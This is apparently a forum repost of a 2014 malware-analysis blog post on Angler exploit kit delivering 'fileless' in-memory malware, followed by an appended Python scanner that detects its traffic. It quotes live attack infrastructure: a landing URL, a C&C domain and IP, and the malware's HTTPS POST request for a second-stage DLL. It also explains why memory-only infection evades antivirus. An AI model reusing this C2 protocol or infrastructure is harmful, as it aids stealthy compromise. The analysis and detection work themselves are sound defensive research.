Nytro Posted August 31, 2014

Angler EK : now capable of "fileless" infection (memory malware)

[Image: Matrix - Agent Jackson avoiding bullets]

(First edition: I asked for help to study this. Hopefully, more technical details to come soon.)

A few days ago I spotted a new pattern in some Angler EK threads:

[Image: New pattern in a Vawtrak thread from Angler EK. Fired: CVE-2013-2551 - 2014-08-28]

[Image: New pattern in another Vawtrak thread from Angler EK. Fired: CVE-2014-0515 - 2014-08-29]

GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive

Wondering what it was and going over the different infection paths, I spotted only one thread without this "new" count?b.
[Note: on 2014-08-31 count?b appeared on that thread too]

[Image: Angler EK - 2014-08-28 "Memory Malware" thread]

The exploits' hashes were the same as on all the other threads, but my usual tools were not able to gather the payload, and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note: I tried Malwarebytes Anti-Exploit and it was able to spot the ROP and stack pivoting).

I spent some time figuring out what was happening here: Angler EK is now able to infect a host without writing the malware to the drive (it's injected directly into the process running the exploited plugin).

[Image: Angler EK (no landing on this screen, CVE-2014-0515 fired) and callback from the malware injected in Internet Explorer. 2nd stage drop: 275c5f650261e80d864faf7cc6b70774, injecting itself into explorer and then gathering Necurs from the same C&C (e.g. be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28, b0e3e860a2dc62cb40fd6ef897ad592b - 2014-08-29, 5830dfde30873176d05604677bab6bd9 - 2014-08-30)]

Malware callback over HTTPS to koqpisea.in : 217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

The call for the 2nd stage payload looks like:

POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}

This feature opens a wide range of possibilities.
Aside from being a powerful way to bypass AV, and an ideal way to run a one-time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc.), it also allows a detailed check of the infected host before becoming a little more noisy and writing anything to disk. It also makes it difficult to grab the dropper (you have to get it from memory or from the recorded traffic, then decode it). This is a powerful move for the attack side.

Additional illustrations:

[Image: Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 - 2014-08-30]

[Image: Courtesy of Will Metcalf from Emerging Threats. Java calling the payload, then "memory payload" activity captured by his Cuckoo instance - 2014-08-28]

Hopefully more to come soon.

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for their help and advice.

Files: AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)

If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling the C&C (IE pid: 860).

[Image: Capture of Fiddler just before pausing the VM - 2014-08-30]

Source: Malware don't need Coffee: Angler EK : now capable of "fileless" infection (memory malware)
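The two network artifacts quoted in the post (the count?b=1 GET under a random-looking directory with a matching Referer, and the JSON POST asking for a 32-bit DLL as 2nd stage) are what a defender can hunt for when the payload never touches disk. The following is an added example, not code from the original post or from Kafeine/Nytro: a small Python scanner that runs both checks over proxy records. The record format (method, url, headers, body), the sample records, and the "mix of letters and digits, at least 8 characters" heuristic for the directory token are constructed assumptions for illustration; the indicator names are made up here.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy records, NOT real traffic. The first two mirror the
# shapes quoted in the post (count?b=1 GET, JSON 2nd-stage POST); the third is
# a benign URL that happens to contain "count?b=1" and must not match.
SAMPLE_RECORDS = [
    {
        "method": "GET",
        "url": "http://rwvs30r2zq.akdnbfb.com/qpbv8tg4ee/count?b=1",
        "headers": {"Referer": "http://rwvs30r2zq.akdnbfb.com/qpbv8tg4ee",
                    "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"},
        "body": "",
    },
    {
        "method": "POST",
        "url": "https://koqpisea.in/",
        "headers": {"Content-Length": "94", "Cache-Control": "no-cache"},
        "body": '{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2",'
                '"tags":[{"type":"dll","64bit":0}]}',
    },
    {
        "method": "GET",
        "url": "https://example.org/static/count?b=1",
        "headers": {"Referer": "https://example.org/"},
        "body": "",
    },
]

# Keys seen in the 2nd-stage request body quoted in the post.
STAGE2_KEYS = {"protocolVersion", "buildId", "id", "tags"}


def _looks_random(token: str) -> bool:
    """Cheap heuristic (an assumption, not from the post): the directory
    token in the Angler URLs mixes letters and digits, e.g. 'qpbv8tg4ee'."""
    return (len(token) >= 8 and token.isalnum()
            and any(c.isdigit() for c in token)
            and any(c.isalpha() for c in token))


def match_count_beacon(rec):
    """Flag GET /<token>/count?b=1 whose Referer is /<token> on the same host.
    The Referer check is what separates this from a benign counter URL."""
    if rec["method"] != "GET":
        return None
    u = urlsplit(rec["url"])
    parts = u.path.strip("/").split("/")
    if len(parts) != 2 or parts[1] != "count":
        return None
    if parse_qs(u.query).get("b") != ["1"]:
        return None
    if not _looks_random(parts[0]):
        return None
    ref = urlsplit(rec["headers"].get("Referer", ""))
    if ref.netloc != u.netloc or ref.path.strip("/") != parts[0]:
        return None
    return {"indicator": "angler_count_beacon", "host": u.netloc, "detail": parts[0]}


def match_stage2_request(rec):
    """Flag a POST whose JSON body carries the bot id / buildId / tags fields
    used to request the in-memory DLL stage. Structure, not values, is matched,
    so a new buildId or bot id still hits."""
    if rec["method"] != "POST" or not rec["body"]:
        return None
    try:
        data = json.loads(rec["body"])
    except ValueError:
        return None
    if not isinstance(data, dict) or not STAGE2_KEYS.issubset(data):
        return None
    tags = data["tags"]
    if not isinstance(tags, list) or not all(isinstance(t, dict) and "type" in t for t in tags):
        return None
    return {"indicator": "fileless_stage2_request",
            "host": urlsplit(rec["url"]).netloc,
            "detail": {"buildId": data["buildId"], "bot_id": data["id"],
                       "wants": [t["type"] for t in tags],
                       "x64": [bool(t.get("64bit", 0)) for t in tags]}}


def scan(records):
    """Run every matcher over every record; return the list of findings."""
    findings = []
    for rec in records:
        for matcher in (match_count_beacon, match_stage2_request):
            hit = matcher(rec)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Both matchers key on structure rather than on the domains from the post, since Angler rotated hosts daily; the count?b match alone is weak, so it is only raised together with the same-host Referer to the random directory. Pair the proxy hit with a memory check of the browser or plugin-container process (the post's Volatility dump is the place to practise that), because nothing will show up in a file-system scan.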